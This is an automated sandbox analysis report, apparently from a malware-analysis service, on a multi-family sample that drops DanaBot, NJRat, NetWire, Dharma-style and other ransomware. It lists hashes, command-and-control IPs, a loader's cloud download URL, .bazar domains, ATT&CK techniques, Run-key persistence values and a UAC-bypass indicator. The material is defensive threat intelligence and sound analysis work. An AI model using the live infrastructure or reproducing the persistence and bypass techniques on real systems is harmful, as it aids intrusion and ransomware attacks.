badrabbit | 8ef176944e54df85db028979ceb66b2b6e807b1615f4254c273d4b433caec0dd

max time kernel
477s
max time network
483s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
12-08-2024 22:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dl2.exe
Size

849KB
MD5

c2055b7fbaa041d9f68b9d5df9b45edd
SHA1

e4bd443bd4ce9029290dcd4bb47cb1a01f3b1b06
SHA256

342f04c4720590c40d24078d46d9b19d8175565f0af460598171d58f5ffc48f3
SHA512

18905b75938b8af9468b1aa3ffbae796a139c2762e623aa6ffb9ec2b293dd04aa1f90d1ed5a7dbda7853795a3688e368121a134c7f63e527a8e5e7679301a1dc
SSDEEP

12288:A3RY3yNqMRTF4q2rxHn2ot/81xpNQyjUXlmoe7ufjHAtjXD7r2:A3RY3R24q+xn/8Xp2yOl5fzQ/2

Malware Config

Extracted

Family

danabot

51.178.195.151

51.222.39.81

149.255.35.125

38.68.50.179

51.77.7.204

rsa_pubkey.plain

Extracted

Family

modiloader

https://drive.google.com/u/0/uc?id=1TcSctGVBajYMA7CFDc158wpvqkpxmkhJ&export=download

Signatures

BadRabbit
Ransomware family discovered in late 2017, mainly targeting Russia and Ukraine.
ransomware badrabbit

BazarBackdoor 64 IoCs

Stealthy backdoor targeting corporate networks, believed to be developed by Trickbot's authors.

backdoor bazarbackdoor

Processes:

msedge.exe

flow	ioc
244	zirabuo.bazar
264	zirabuo.bazar
213	zirabuo.bazar
228	zirabuo.bazar
236	zirabuo.bazar
253	zirabuo.bazar
259	zirabuo.bazar
260	zirabuo.bazar
193	zirabuo.bazar
222	zirabuo.bazar
216	zirabuo.bazar
223	zirabuo.bazar
234	zirabuo.bazar
238	zirabuo.bazar
240	zirabuo.bazar
242	zirabuo.bazar
205	zirabuo.bazar
208	zirabuo.bazar
246	zirabuo.bazar
261	zirabuo.bazar
239	zirabuo.bazar
265	zirabuo.bazar
220	zirabuo.bazar
247	zirabuo.bazar
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection	msedge.exe
212	zirabuo.bazar
263	zirabuo.bazar
225	zirabuo.bazar
235	zirabuo.bazar
200	zirabuo.bazar
224	zirabuo.bazar
232	zirabuo.bazar
262	zirabuo.bazar
217	zirabuo.bazar
227	zirabuo.bazar
233	zirabuo.bazar
249	zirabuo.bazar
190	zirabuo.bazar
218	zirabuo.bazar
214	zirabuo.bazar
219	zirabuo.bazar
251	zirabuo.bazar
266	zirabuo.bazar
192	zirabuo.bazar
204	zirabuo.bazar
229	zirabuo.bazar
243	zirabuo.bazar
250	zirabuo.bazar
252	zirabuo.bazar
257	zirabuo.bazar
191	zirabuo.bazar
207	zirabuo.bazar
230	zirabuo.bazar
245	zirabuo.bazar
248	zirabuo.bazar
255	zirabuo.bazar
258	zirabuo.bazar
201	zirabuo.bazar
211	zirabuo.bazar
256	zirabuo.bazar
196	zirabuo.bazar
210	zirabuo.bazar
215	zirabuo.bazar
226	zirabuo.bazar

Danabot
Danabot is a modular banking Trojan that has been linked with other malware.
trojan banker danabot

Danabot x86 payload 1 IoCs

Detection of Danabot x86 payload, mapped in memory during the execution of its loader.

botnet

Processes:

resource	yara_rule
C:\Users\Admin\DOWNLO~1\DanaBot.dll	family_danabot

Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
ransomware dharma
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Netwire
Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.
botnet stealer netwire
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

ModiLoader First Stage 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\Downloads\Unconfirmed 895779.crdownload	modiloader_stage1
behavioral2/memory/4964-603-0x0000000010410000-0x000000001047E000-memory.dmp	modiloader_stage1

Renames multiple (526) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Blocklisted process makes network request 10 IoCs

Processes:

rundll32.exe

flow	pid	process
121	2072	rundll32.exe
133	2072	rundll32.exe
150	2072	rundll32.exe
154	2072	rundll32.exe
159	2072	rundll32.exe
165	2072	rundll32.exe
173	2072	rundll32.exe
187	2072	rundll32.exe
341	2072	rundll32.exe
507	2072	rundll32.exe

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

5644 netsh.exe

pid	process
5644	netsh.exe

Tries to connect to .bazar domain 64 IoCs

Attempts to lookup or connect to a .bazar domain, used by BazarBackdoor, Trickbot, and potentially others.

Processes:

flow	ioc
251	zirabuo.bazar
262	zirabuo.bazar
223	zirabuo.bazar
232	zirabuo.bazar
247	zirabuo.bazar
254	zirabuo.bazar
234	zirabuo.bazar
240	zirabuo.bazar
264	zirabuo.bazar
266	zirabuo.bazar
216	zirabuo.bazar
221	zirabuo.bazar
229	zirabuo.bazar
242	zirabuo.bazar
209	zirabuo.bazar
227	zirabuo.bazar
230	zirabuo.bazar
259	zirabuo.bazar
196	zirabuo.bazar
204	zirabuo.bazar
217	zirabuo.bazar
260	zirabuo.bazar
191	zirabuo.bazar
212	zirabuo.bazar
218	zirabuo.bazar
222	zirabuo.bazar
239	zirabuo.bazar
243	zirabuo.bazar
246	zirabuo.bazar
253	zirabuo.bazar
190	zirabuo.bazar
210	zirabuo.bazar
228	zirabuo.bazar
233	zirabuo.bazar
256	zirabuo.bazar
201	zirabuo.bazar
214	zirabuo.bazar
200	zirabuo.bazar
226	zirabuo.bazar
244	zirabuo.bazar
265	zirabuo.bazar
215	zirabuo.bazar
236	zirabuo.bazar
258	zirabuo.bazar
263	zirabuo.bazar
205	zirabuo.bazar
211	zirabuo.bazar
237	zirabuo.bazar
238	zirabuo.bazar
241	zirabuo.bazar
257	zirabuo.bazar
192	zirabuo.bazar
220	zirabuo.bazar
248	zirabuo.bazar
252	zirabuo.bazar
206	zirabuo.bazar
213	zirabuo.bazar
245	zirabuo.bazar
255	zirabuo.bazar
193	zirabuo.bazar
224	zirabuo.bazar
225	zirabuo.bazar
231	zirabuo.bazar
235	zirabuo.bazar

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exemsedge.exeCoronaVirus.exemsedge.exemsedge.exemsedge.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	msedge.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	msedge.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	CoronaVirus.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	msedge.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	msedge.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	msedge.exe

Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
credential_access stealer

Windows Credential Manager
T1555.004

Drops startup file 11 IoCs

Processes:

NJRat.exeCoronaVirus.exeDeriaLock.exeDeriaLock.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe\:SmartScreen:$DATA	NJRat.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CoronaVirus.exe	CoronaVirus.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-015EE178.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe	CoronaVirus.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta	CoronaVirus.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LOGON.exe	DeriaLock.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LOGON.exe	DeriaLock.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe	NJRat.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-015EE178.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b9584a316aeb9ca9b31edd4db18381f5.exe	NJRat.exe

Executes dropped EXE 33 IoCs

Processes:

DanaBot.exeNJRat.exeNJRat.exeNJRat.exeNJRat.exeNJRat.exeNJRat.exeNetWire.exeNetWire.exeNetWire.exeCoronaVirus.exeCoronaVirus.exefodhelper.exemsedge.exemsedge.exemsedge.exeDeriaLock.exeDeriaLock.exemsedge.exemsedge.exemsedge.exeBadRabbit.exeBadRabbit.exe4479.tmpBadRabbit.exeBadRabbit.exemsedge.exemsedge.exemsedge.exe$uckyLocker.exe$uckyLocker.exemsedge.exemsedge.exe

pid	process
6056	DanaBot.exe
4848	NJRat.exe
2544	NJRat.exe
6060	NJRat.exe
5276	NJRat.exe
2192	NJRat.exe
5376	NJRat.exe
4964	NetWire.exe
1704	NetWire.exe
4380	NetWire.exe
2092	CoronaVirus.exe
5332	CoronaVirus.exe
39040	fodhelper.exe
37184	msedge.exe
37116	msedge.exe
19224	msedge.exe
36620	DeriaLock.exe
36524	DeriaLock.exe
33976	msedge.exe
34096	msedge.exe
33208	msedge.exe
32984	BadRabbit.exe
32844	BadRabbit.exe
32372	4479.tmp
31752	BadRabbit.exe
31608	BadRabbit.exe
31160	msedge.exe
31108	msedge.exe
30672	msedge.exe
30476	$uckyLocker.exe
30356	$uckyLocker.exe
30072	msedge.exe
30020	msedge.exe

Loads dropped DLL 20 IoCs

Processes:

regsvr32.exerundll32.exeNetWire.exefodhelper.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exerundll32.exerundll32.exerundll32.exerundll32.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exe

pid	process
5264	regsvr32.exe
5264	regsvr32.exe
2072	rundll32.exe
1812	NetWire.exe
39040	fodhelper.exe
37116	msedge.exe
37184	msedge.exe
19224	msedge.exe
33976	msedge.exe
34096	msedge.exe
33208	msedge.exe
32804	rundll32.exe
32592	rundll32.exe
31568	rundll32.exe
31432	rundll32.exe
31108	msedge.exe
31160	msedge.exe
30672	msedge.exe
30072	msedge.exe
30020	msedge.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Unexpected DNS network traffic destination 64 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description	ioc
Destination IP	66.70.211.246
Destination IP	167.99.153.82
Destination IP	46.101.70.183
Destination IP	31.171.251.118
Destination IP	130.255.78.223
Destination IP	45.71.112.70
Destination IP	128.52.130.209
Destination IP	5.132.191.104
Destination IP	77.73.68.161
Destination IP	69.164.196.21
Destination IP	46.28.207.199
Destination IP	185.117.154.144
Destination IP	91.217.137.37
Destination IP	188.165.200.156
Destination IP	50.3.82.215
Destination IP	192.52.166.110
Destination IP	162.248.241.94
Destination IP	163.53.248.170
Destination IP	5.132.191.104
Destination IP	31.171.251.118
Destination IP	139.99.96.146
Destination IP	169.239.202.202
Destination IP	82.196.9.45
Destination IP	212.24.98.54
Destination IP	45.63.124.65
Destination IP	130.255.78.223
Destination IP	89.35.39.64
Destination IP	91.217.137.37
Destination IP	193.183.98.66
Destination IP	139.59.208.246
Destination IP	198.251.90.143
Destination IP	167.99.153.82
Destination IP	144.76.133.38
Destination IP	178.17.170.179
Destination IP	158.69.160.164
Destination IP	159.89.249.249
Destination IP	87.98.175.85
Destination IP	172.98.193.42
Destination IP	46.101.70.183
Destination IP	192.99.85.244
Destination IP	45.71.112.70
Destination IP	128.52.130.209
Destination IP	104.238.186.189
Destination IP	158.69.239.167
Destination IP	139.59.208.246
Destination IP	69.164.196.21
Destination IP	69.164.196.21
Destination IP	91.217.137.37
Destination IP	139.59.208.246
Destination IP	82.141.39.32
Destination IP	158.69.160.164
Destination IP	94.177.171.127
Destination IP	217.12.210.54
Destination IP	63.231.92.27
Destination IP	192.99.85.244
Destination IP	46.101.70.183
Destination IP	217.12.210.54
Destination IP	81.2.241.148
Destination IP	45.63.124.65
Destination IP	192.52.166.110
Destination IP	35.196.105.24
Destination IP	94.177.171.127
Destination IP	142.4.204.111
Destination IP	142.4.205.47

Abuse Elevation Control Mechanism: Bypass User Account Control 1 TTPs 1 IoCs
UAC Bypass Attempt via SilentCleanup Task.
defense_evasion privilege_escalation

Bypass User Account Control
T1548.002

Processes:

schtasks.exe

pid process

8508 schtasks.exe

pid	process
8508	schtasks.exe

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

NJRat.exeNetWire.exeCoronaVirus.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b9584a316aeb9ca9b31edd4db18381f5 = "\"C:\\Users\\Admin\\Downloads\\NJRat.exe\" .."	NJRat.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\b9584a316aeb9ca9b31edd4db18381f5 = "\"C:\\Users\\Admin\\Downloads\\NJRat.exe\" .."	NJRat.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Qspt = "C:\\Users\\Admin\\AppData\\Local\\Qspt\\Qspt.hta"	NetWire.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CoronaVirus.exe = "C:\\Windows\\System32\\CoronaVirus.exe"	CoronaVirus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Windows\System32\Info.hta = "mshta.exe \"C:\\Windows\\System32\\Info.hta\""	CoronaVirus.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Users\Admin\AppData\Roaming\Info.hta = "mshta.exe \"C:\\Users\\Admin\\AppData\\Roaming\\Info.hta\""	CoronaVirus.exe

Drops desktop.ini file(s) 64 IoCs

Processes:

CoronaVirus.exe

description	ioc	process
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	CoronaVirus.exe
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-1194130065-3471212556-1656947724-1000\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Program Files\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini	CoronaVirus.exe
File opened for modification	C:\$Recycle.Bin\S-1-5-21-1194130065-3471212556-1656947724-1000\desktop.ini	CoronaVirus.exe
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Public\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini	CoronaVirus.exe
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini	CoronaVirus.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

179 drive.google.com
113 raw.githubusercontent.com
114 raw.githubusercontent.com
178 drive.google.com
Drops file in System32 directory 2 IoCs

Processes:

CoronaVirus.exe

description ioc process

File created C:\Windows\System32\CoronaVirus.exe CoronaVirus.exe
File created C:\Windows\System32\Info.hta CoronaVirus.exe

flow	ioc
179	drive.google.com
113	raw.githubusercontent.com
114	raw.githubusercontent.com
178	drive.google.com

description	ioc	process
File created	C:\Windows\System32\CoronaVirus.exe	CoronaVirus.exe
File created	C:\Windows\System32\Info.hta	CoronaVirus.exe

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

$uckyLocker.exe$uckyLocker.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\Desktop\Wallpaper = "0"	$uckyLocker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\Desktop\Wallpaper = "0"	$uckyLocker.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

NetWire.exe

description pid process target process

PID 1812 set thread context of 7712 1812 NetWire.exe ieinstal.exe

description	pid	process	target process
PID 1812 set thread context of 7712	1812	NetWire.exe	ieinstal.exe

Drops file in Program Files directory 64 IoCs

Processes:

CoronaVirus.exe

description	ioc	process
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL022.XML	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Work\contrast-white\LargeTile.scale-125.png	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp2-pl.xrm-ms	CoronaVirus.exe
File created	C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Data.OData.NetFX35.dll.id-015EE178.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ScCore.dll	CoronaVirus.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Net.HttpListener.dll	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\PhotosMedTile.contrast-white_scale-125.png	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\plugins.js.id-015EE178.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ms_get.svg	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSIPC\en-us\msipc.dll.mui.id-015EE178.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-64_altform-unplated.png	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\ExchangeBadge.scale-400.png	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubBadgeLogo.scale-100_contrast-high.png	CoronaVirus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\css\main-selector.css.id-015EE178.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\icons_ie8.gif.id-015EE178.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\eu-es\ui-strings.js	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\edit_pdf_poster2x.jpg	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\PackageManifests\AppXManifestLoc.16.en-us.xml	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\ru-RU\View3d\3DViewerProductDescription-universal.xml	CoronaVirus.exe
File opened for modification	C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\zh-Hant\Microsoft.VisualBasic.Forms.resources.dll	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\th_get.svg	CoronaVirus.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\zh-cn_get.svg.id-015EE178.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\msix.dll	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\Ole DB\es-ES\sqloledb.rll.mui	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxIdentityProvider_12.50.6001.0_x64__8wekyb3d8bbwe\AppxSignature.p7x	CoronaVirus.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ja.txt	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteNotebookLargeTile.scale-100.png	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\desktop.js	CoronaVirus.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\new_icons_retina.png	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_Trial-ul-oob.xrm-ms	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019VL_MAK_AE-pl.xrm-ms.id-015EE178.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\OFFSYMSB.TTF.id-015EE178.[[email protected]].ncov	CoronaVirus.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_targetsize-24.png	CoronaVirus.exe
